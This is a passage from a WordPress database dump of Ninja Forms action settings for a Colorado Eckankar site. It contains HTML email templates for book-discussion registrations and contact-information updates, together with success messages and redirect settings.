Discussion</span></div><div align=\"center\"><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">Registration</span><br></div><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\"></span></div></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new Book Discussion registration                                  has been received for <br>\"<span style=\"font-size: 19px; line-height: 125%; color: #000000;\"><b><span style=\"font-size: 19px; line-height: 125%; color: #000000;\"><span style=\"color: #0963ba;\"><span style=\"color: #000000;\"><em>Autobiography of a Modern Prophet</em></span></span></span></b>\"</span>.&nbsp; </p><p style=\"line-height: 125%; margin-top: 0px; margin-bottom: 0px;\"><span style=\"color: #333333; font-size: 20px;\">Loveland Class information:<br></span><span style=\"font-size: 20px; line-height: 125%; color: #000000;\"><strong><span style=\"line-height: 125%; color: #000000;\">10:30 <span style=\"line-height: 125%; color: #000000;\"><strong><span style=\"line-height: 125%; color: #000000;\">am </span></strong></span>- 11:30 pm - (4th Sunday - 12 Occurrences)</span></strong></span></p></b><b>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <b>Name:</b>&nbsp; <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <b>Email:</b>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>'),(6098,204,'from_name','','from_name',''),(6099,204,'from_address','','from_address',''),(6100,204,'reply_to','{field:email}','reply_to','{field:email}'),(6101,204,'email_format','html','email_format','html'),(6102,204,'cc','','cc',''),(6103,204,'bcc','','bcc',''),(6104,204,'attach_csv','','attach_csv',''),(6105,204,'parent_id','44','parent_id','44'),(6106,204,'email_message_plain','','email_message_plain',''),(6107,205,'title','','title',''),(6108,205,'key','','key',''),(6109,205,'type','successmessage','type','successmessage'),(6110,205,'active','1','active','1'),(6111,205,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(6112,205,'label','Success Message','label','Success Message'),(6113,205,'objectType','Action','objectType','Action'),(6114,205,'objectDomain','actions','objectDomain','actions'),(6115,205,'editActive','','editActive',''),(6116,205,'message','Your form has been successfully submitted.','message','Your form has been successfully submitted.'),(6117,205,'order','1','order','1'),(6118,205,'payment_gateways','','payment_gateways',''),(6119,205,'payment_total','0','payment_total','0'),(6120,205,'tag','','tag',''),(6121,205,'to','{wp:admin_email}','to','{wp:admin_email}'),(6122,205,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(6123,205,'email_message','{fields_table}','email_message','{fields_table}'),(6124,205,'from_name','','from_name',''),(6125,205,'from_address','','from_address',''),(6126,205,'reply_to','','reply_to',''),(6127,205,'email_format','html','email_format','html'),(6128,205,'cc','','cc',''),(6129,205,'bcc','','bcc',''),(6130,205,'attach_csv','','attach_csv',''),(6131,205,'redirect_url','','redirect_url',''),(6132,205,'success_msg','<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for this book discussion!</b></p>\n<p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email with Zoom Login information.</p>','success_msg','<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for this book discussion!</b></p>\n<p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email with Zoom Login information.</p>'),(6133,205,'parent_id','44','parent_id','44'),(6134,205,'email_message_plain','','email_message_plain',''),(6135,205,'submitter_email','','submitter_email',''),(6136,205,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(6137,205,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(6138,205,'set_subs_to_expire','0','set_subs_to_expire','0'),(6139,205,'subs_expire_time','90','subs_expire_time','90'),(6140,205,'drawerDisabled','','drawerDisabled',''),(6264,15,'drawerDisabled','','drawerDisabled',''),(6265,210,'objectType','Action','objectType','Action'),(6266,210,'objectDomain','actions','objectDomain','actions'),(6267,210,'editActive','','editActive',''),(6268,210,'to','{wp:admin_email}','to','{wp:admin_email}'),(6269,210,'reply_to','','reply_to',''),(6270,210,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(6271,210,'email_message','{fields_table}','email_message','{fields_table}'),(6272,210,'email_message_plain','','email_message_plain',''),(6273,210,'from_name','','from_name',''),(6274,210,'from_address','','from_address',''),(6275,210,'email_format','html','email_format','html'),(6276,210,'cc','','cc',''),(6277,210,'bcc','','bcc',''),(6278,210,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(6279,210,'redirect_url','https://eckankar-colorado.org/thank-you-for-signing-up-for-our-event/','redirect_url','https://eckankar-colorado.org/thank-you-for-signing-up-for-our-event/'),(6280,210,'drawerDisabled','','drawerDisabled',''),(6281,14,'drawerDisabled','','drawerDisabled',''),(6282,16,'drawerDisabled','','drawerDisabled',''),(6283,211,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(6284,211,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(6285,211,'set_subs_to_expire','0','set_subs_to_expire','0'),(6286,211,'subs_expire_time','90','subs_expire_time','90'),(6287,211,'submitter_email','','submitter_email',''),(6288,211,'redirect_url','','redirect_url',''),(6289,211,'bcc','','bcc',''),(6290,211,'cc','','cc',''),(6291,211,'email_format','html','email_format','html'),(6292,211,'from_address','','from_address',''),(6293,211,'from_name','','from_name',''),(6294,211,'email_message_plain','','email_message_plain',''),(6295,211,'payment_gateways','','payment_gateways',''),(6296,211,'payment_total','0','payment_total','0'),(6297,211,'tag','','tag',''),(6298,211,'to','{wp:admin_email}','to','{wp:admin_email}'),(6299,211,'reply_to','','reply_to',''),(6300,211,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(6301,211,'email_message','{fields_table}','email_message','{fields_table}'),(6302,211,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(6303,211,'editActive','','editActive',''),(6304,211,'objectDomain','actions','objectDomain','actions'),(6305,211,'objectType','Action','objectType','Action'),(6306,211,'title','','title',''),(6307,211,'key','','key',''),(6308,211,'type','save','type','save'),(6309,211,'active','1','active','1'),(6310,211,'created_at','2018-01-03 11:45:13','created_at','2018-01-03 11:45:13'),(6311,211,'label','Save Form','label','Save Form'),(6312,211,'parent_id','4','parent_id','4'),(6313,211,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(6314,212,'objectType','Action','objectType','Action'),(6315,212,'objectDomain','actions','objectDomain','actions'),(6316,212,'editActive','','editActive',''),(6317,212,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(6318,212,'payment_gateways','','payment_gateways',''),(6319,212,'payment_total','0','payment_total','0'),(6320,212,'tag','','tag',''),(6321,212,'email_message_plain','','email_message_plain',''),(6322,212,'title','','title',''),(6323,212,'key','','key',''),(6324,212,'type','email','type','email'),(6325,212,'active','1','active','1'),(6326,212,'created_at','2018-01-03 11:45:13','created_at','2018-01-03 11:45:13'),(6327,212,'date_updated','2016-01-15','date_updated','2016-01-15'),(6328,212,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(6329,212,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(6330,212,'to','{field:email_204}','to','{field:email_204}'),(6331,212,'email_subject','Add/Update Email or Address','email_subject','Add/Update Email or Address'),(6332,212,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%;font-size:35px;padding-top: 20px;\" align=\"left \" valign=\"\">Eckankar In Colorado  <p style=\"background-color: #ebebeb;color: #333333;font-size:25px;margin-top: 0px;\"><b>Contact Information Update</b></p></td><td></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello {field:textbox_202},</strong></p><p>You have created a new form submission on the Eckankar In Colorado website. Your submission is requesting an update to either email or your mailing address.</p><p>For your records, here is a copy of the information that you have submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_202}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_203}<br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_204}<br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_205}</span></p><p><span style=\"color: #333333\"><strong>STREET ADDRESS:</strong> {field:street_address_add_or_update_mailing_address_1616603898544}<br><strong>CITY:</strong> {field:city_216}<br><strong>STATE:</strong> {field:listselect_218}<br><strong>COUNTRY:</strong> {field:listcountry_219}<br> </span></p><p><span style=\"color: #333333\"><strong>COMMENTS: </strong>{field:textarea_210}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">Thanks for updating your information with us!<br><br>If you have any questions regarding the origin of this form, please feel free to contact the<br> Eckankar In Colorado webmaster at:&nbsp;&nbsp;<em>webmaster@eckankar-colorado.org</em><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%;font-size:35px;padding-top: 20px;\" align=\"left \" valign=\"\">Eckankar In Colorado  <p style=\"background-color: #ebebeb;color: #333333;font-size:25px;margin-top: 0px;\"><b>Contact Information Update</b></p></td><td></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello {field:textbox_202},</strong></p><p>You have created a new form submission on the Eckankar In Colorado website. Your submission is requesting an update to either email or your mailing address.</p><p>For your records, here is a copy of the information that you have submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_202}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_203}<br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_204}<br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_205}</span></p><p><span style=\"color: #333333\"><strong>STREET ADDRESS:</strong> {field:street_address_add_or_update_mailing_address_1616603898544}<br><strong>CITY:</strong> {field:city_216}<br><strong>STATE:</strong> {field:listselect_218}<br><strong>COUNTRY:</strong> {field:listcountry_219}<br> </span></p><p><span style=\"color: #333333\"><strong>COMMENTS: </strong>{field:textarea_210}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">Thanks for updating your information with us!<br><br>If you have any questions regarding the origin of this form, please feel free to contact the<br> Eckankar In Colorado webmaster at:&nbsp;&nbsp;<em>webmaster@eckankar-colorado.org</em><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>'),(6333,212,'attach_csv','0','attach_csv','0'),(6334,212,'email_format','html','email_format','html'),(6335,212,'reply_to','','reply_to',''),(6336,212,'cc','','cc',''),(6337,212,'bcc','','bcc',''),(6338,212,'redirect_url','','redirect_url',''),(6339,212,'success_msg','','success_msg',''),(6340,212,'label','Send copy to user','label','Send copy to user'),(6341,212,'parent_id','4','parent_id','4'),(6342,212,'drawerDisabled','','drawerDisabled',''),(6343,213,'objectType','Action','objectType','Action'),(6344,213,'objectDomain','actions','objectDomain','actions'),(6345,213,'editActive','','editActive',''),(6346,213,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(6347,213,'payment_gateways','','payment_gateways',''),(6348,213,'payment_total','0','payment_total','0'),(6349,213,'tag','','tag',''),(6350,213,'email_message_plain','','email_message_plain',''),(6351,213,'submitter_email','','submitter_email',''),(6352,213,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(6353,213,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(6354,213,'set_subs_to_expire','0','set_subs_to_expire','0'),(6355,213,'subs_expire_time','90','subs_expire_time','90'),(6356,213,'title','','title',''),(6357,213,'key','','key',''),(6358,213,'type','successmessage','type','successmessage'),(6359,213,'active','1','active','1'),(6360,213,'created_at','2018-01-03 11:45:13','created_at','2018-01-03 11:45:13'),(6361,213,'date_updated','2016-01-15','date_updated','2016-01-15'),(6362,213,'from_name','','from_name',''),(6363,213,'from_address','','from_address',''),(6364,213,'to','{wp:admin_email}','to','{wp:admin_email}'),(6365,213,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(6366,213,'email_message','{fields_table}','email_message','{fields_table}'),(6367,213,'attach_csv','0','attach_csv','0'),(6368,213,'email_format','html','email_format','html'),(6369,213,'reply_to','','reply_to',''),(6370,213,'cc','','cc',''),(6371,213,'bcc','','bcc',''),(6372,213,'redirect_url','','redirect_url',''),(6373,213,'success_msg','<div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 30px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center; font-size:20px\">We appreciate you taking the time to update your contact information!</div><div style=\"text-align: center; font-size:20px\"><br></div><div style=\"text-align: center; font-size:20px;\">Your specific communication update(s) will be added to our database.&nbsp;</div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div>','success_msg','<div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 30px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center; font-size:20px\">We appreciate you taking the time to update your contact information!</div><div style=\"text-align: center; font-size:20px\"><br></div><div style=\"text-align: center; font-size:20px;\">Your specific communication update(s) will be added to our database.&nbsp;</div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div>'),(6374,213,'label','Success Message','label','Success Message'),(6375,213,'parent_id','4','parent_id','4'),(6376,213,'drawerDisabled','','drawerDisabled',''),(6377,214,'objectType','Action','objectType','Action'),(6378,214,'objectDomain','actions','objectDomain','actions'),(6379,214,'editActive','','editActive',''),(6380,214,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(6381,214,'payment_gateways','','payment_gateways',''),(6382,214,'payment_total','0','payment_total','0'),(6383,214,'tag','','tag',''),(6384,214,'email_message_plain','','email_message_plain',''),(6385,214,'title','','title',''),(6386,214,'key','','key',''),(6387,214,'type','email','type','email'),(6388,214,'active','1','active','1'),(6389,214,'created_at','2018-01-03 11:45:13','created_at','2018-01-03 11:45:13'),(6390,214,'date_updated','2016-01-19','date_updated','2016-01-19'),(6391,214,'from_name','Add/Update Email or Address','from_name','Add/Update Email or Address'),(6392,214,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(6393,214,'to','co.eck.dba@eckankar-colorado.org','to','co.eck.dba@eckankar-colorado.org'),(6394,214,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(6395,214,'attach_csv','0','attach_csv','0'),(6396,214,'email_format','html','email_format','html'),(6397,214,'reply_to','','reply_to',''),(6398,214,'cc','','cc',''),(6399,214,'bcc','','bcc',''),(6400,214,'redirect_url','','redirect_url',''),(6401,214,'success_msg','','success_msg',''),(6402,214,'label','Admin Email','label','Admin Email'),(6403,214,'parent_id','4','parent_id','4'),(6404,214,'drawerDisabled','','drawerDisabled',''),(6405,214,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%;font-size:35px;padding-top: 20px;\" align=\"left \" valign=\"\">Eckankar In Colorado  <p style=\"background-color: #ebebeb;color: #333333;font-size:25px;margin-top: 10px;\"><b>Contact Information Update - Public</b></p></td><td>&nbsp;</td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello!</strong><strong> You have a new<em> \"Add/Update Email or Address\"</em> form submission.<br> </strong><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the database administrator for Eckankar In Colorado.<br> <strong><br> The following person has added or updated their personal information.<br></strong>Here is the information that <strong><em><span style=\"color: #333333\">{field:textbox_202}</span> <span style=\"color: #333333\">{field:lastname_203}</span> </em></strong>has submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_202}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_203}<br><strong>TELEPHONE:</strong> {field:phone_205}<br><strong>EMAIL:</strong> {field:email_204}<br> </span><br> <strong>STREET </strong><span style=\"color: #333333\"><strong>ADDRESS:</strong> {field:street_address_add_or_update_mailing_address_1616603898544}<br> </span><span style=\"color: #333333\"><strong>CITY:</strong> {field:city_216}<br><strong>STATE:</strong> {field:listselect_218}<br><strong>COUNTRY:</strong> {field:listcountry_219}<br></span></p><p><span style=\"color: #333333\"><strong>COMMENTS: </strong>{field:textarea_210}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster at this email address:&nbsp;&nbsp;<em>webmaster@eckankar-colorado.org</em><br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%;font-size:35px;padding-top: 20px;\" align=\"left \" valign=\"\">Eckankar In Colorado  <p style=\"background-color: #ebebeb;color: #333333;font-size:25px;margin-top: 10px;\"><b>Contact Information Update - Public</b></p></td><td>&nbsp;</td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello!</strong><strong> You have a new<em> \"Add/Update Email or Address\"</em> form submission.<br> </strong><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the database administrator for Eckankar In Colorado.<br> <strong><br> The following person has added or updated their personal information.<br></strong>Here is the information that <strong><em><span style=\"color: #333333\">{field:textbox_202}</span> <span style=\"color: #333333\">{field:lastname_203}</span> </em></strong>has submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_202}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_203}<br><strong>TELEPHONE:</strong> {field:phone_205}<br><strong>EMAIL:</strong> {field:email_204}<br> </span><br> <strong>STREET </strong><span style=\"color: #333333\"><strong>ADDRESS:</strong> {field:street_address_add_or_update_mailing_address_1616603898544}<br> </span><span style=\"color: #333333\"><strong>CITY:</strong> {field:city_216}<br><strong>STATE:</strong> {field:listselect_218}<br><strong>COUNTRY:</strong> {field:listcountry_219}<br></span></p><p><span style=\"color: #333333\"><strong>COMMENTS: </strong>{field:textarea_210}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster at this email address:&nbsp;&nbsp;<em>webmaster@eckankar-colorado.org</em><br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>'),(6406,215,'key','','key',''),(6407,215,'title','','title',''),(6408,215,'type','save','type','save'),(6409,215,'active','1','active','1'),(6410,215,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(6411,215,'label','Store Submission','label','Store Submission'),(6412,215,'objectType','Action','objectType','Action'),(6413,215,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(6414,215,'email_message_plain','','email_message_plain',''),(6415,215,'submitter_email','','submitter_email',''),(6416,215,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(6417,215,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(6418,215,'set_subs_to_expire','0','set_subs_to_expire','0'),(6419,215,'subs_expire_time','90','subs_expire_time','90'),(6420,215,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(6421,215,'drawerDisabled','','drawerDisabled',''),(6422,215,'objectDomain','actions','objectDomain','actions'),(6423,215,'editActive','','editActive',''),(6424,215,'order','3','order','3'),(6425,215,'payment_gateways','','payment_gateways',''),(6426,215,'payment_total','0','payment_total','0'),(6427,215,'tag','','tag',''),(6428,215,'to','{wp:admin_email}','to','{wp:admin_email}'),(6429,215,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(6430,215,'email_message','{fields_table}','email_message','{fields_table}'),(6431,215,'from_name','','from_name',''),(6432,215,'from_address','','from_address',''),(6433,215,'reply_to','','reply_to',''),(6434,215,'email_format','html','email_format','html'),(6435,215,'cc','','cc',''),(6436,215,'bcc','','bcc',''),(6437,215,'attach_csv','','attach_csv',''),(6438,215,'redirect_url','','redirect_url',''),(6439,215,'parent_id','44','parent_id','44'),(6440,216,'email_subject','Thank you for registering for our event','email_subject','Thank you for registering for our event'),(6441,216,'tag','','tag',''),(6442,216,'payment_total','0','payment_total','0'),(6443,216,'order','2','order','2'),(6444,216,'payment_gateways','','payment_gateways',''),(6445,216,'message','{all_fields_table}','message','{all_fields_table}'),(6446,216,'reply_to','','reply_to',''),(6447,216,'email_format','html','email_format','html'),(6448,216,'key','','key',''),(6449,216,'type','email','type','email'),(6450,216,'active','1','active','1'),(6451,216,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(6452,216,'label','User Email Confirmation','label','User Email Confirmation'),(6453,216,'objectType','Action','objectType','Action'),(6454,216,'title','','title',''),(6455,216,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(6456,216,'editActive','','editActive',''),(6457,216,'to','{field:email}','to','{field:email}'),(6458,216,'objectDomain','actions','objectDomain','actions'),(6459,216,'from_name','','from_name',''),(6460,216,'from_address','{system:admin_email}','from_address','{system:admin_email}'),(6461,216,'cc','','cc',''),(6462,216,'bcc','','bcc',''),(6463,216,'attach_csv','','attach_csv',''),(6464,216,'parent_id','44','parent_id','44'),(6465,216,'email_message_plain','','email_message_plain',''),(6466,216,'drawerDisabled','','drawerDisabled',''),(6467,216,'email_message','<meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>ELSS REGISTRATION - USER CONFIRMATION</title>    <!--[if mso]>  <style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  </noscript>  <![endif]-->    <style>    table, td, div, h1, p {      font-family: Arial, sans-serif;    }    @media screen and (max-width: 530px) {      .unsub {        display: block;        padding: 8px;        margin-top: 14px;        border-radius: 6px;        background-color: #555555;        text-decoration: none !important;        font-weight: bold;      }      .col-lge {        max-width: 100% !important;      }    }    @media screen and (min-width: 531px) {      .col-sml {        max-width: 27% !important;      }      .col-lge {        max-width: 73% !important;      }    }  </style>        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table 